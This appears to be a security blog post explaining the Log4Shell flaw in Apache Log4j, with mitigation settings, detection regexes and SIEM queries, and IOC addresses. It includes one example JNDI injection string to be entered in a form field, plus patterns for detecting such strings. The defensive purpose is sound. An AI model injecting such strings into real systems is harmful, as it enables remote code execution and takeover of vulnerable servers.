The CRITICAL Log4j Java Vulnerability: How to Detect and Mitigate It

Apache Log4j is a java based fast, reliable and flexible logging framework. There are a wide range of frameworks, applications, and tools that leverage Log4j such as Apache Struts2, Apache Solr, Apache Flink, Apache Druid, iCloud, Steam, and Minecraft.

The worst-case being not everyone knows whether Log4j is being used in their environment. How many of you really knew elasticsearch uses Log4j? Any organization using Java applications or hardware running Log4j < 2.15 is likely vulnerable.

CVE-2021–44228 (Log4Shell) is an unauthenticated Remote Code Execution(RCE) vulnerability & 0-day exploit which allows an attacker to take over a system that uses Apache Log4j 2.0 to 2.14.1. If successfully exploited, attackers can perform RCE and compromise the affected server leading to a full takeover of the system.

To trigger this vulnerability, all the attacker needs to do is get the app to log a special string. The vulnerability gets triggered if the logged string contains any untrusted strings in any part of the logged data. Guess what can be used to log this string to the system? HTTP headers, Usernames, Email addresses and URLs.

Put simply, if you fill a form with the name

${jndi:ldap://127.0.0.1:1389/a}

Why does this happen?

Researchers concluded that this is a Java deserialization failure because Log4j makes network requests through the JNDI to an LDAP server and executes any code that is returned. The error is triggered within log messages with the use of the $ {} syntax. And apparently it doesn’t affect the system if JNDI cannot load remote code using LDAP. For insights about how the attack works visit this.

Mitigation

If you’re using Java version less than 1.8 & log4j >= 2.10

• Setting the system property formatMsgNoLookups: true
• Set the JVM parameter -Dlog4j2.formatMsgNoLookups=true
• Elasticsearch using log4j-2.10.x can add -Dlog4j2.formatMsgNoLookups=true to ES_JAVA_OPTS or /etc/elasticsearch/jvm.options
• Removing JndiLookup class from the classpath

Apache has released Log4j 2.15.0 to address the maximum severity CVE-2021–44228 RCE vulnerability and is recommended to upgrade the vulnerable instances.

Detection

Regex

/(\$|\%24)\s*(\{|%7b)\s*jndi\s*(\:|\%3a)/i

ELK

index=bro AND http_uri:(\/\$\{jndi\:*)

Network detection using ET Ruleset

tail 10 < 

https://rules.emergingthreatspro.com/open/suricata-5.0/rules/emerging-exploit.rules

Splunk

index=* ${jndi:*}

For YARA, visit log4j_rce_detection

IOCs

Try Hunting for these in your environment.

• 194.48.199.78
• 181.214.39.2
• 62.76.41.46
• 45.137.21.9
• CVE-2021–44228_IPs.csv
• Callback Domains

References:

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228

Also published here.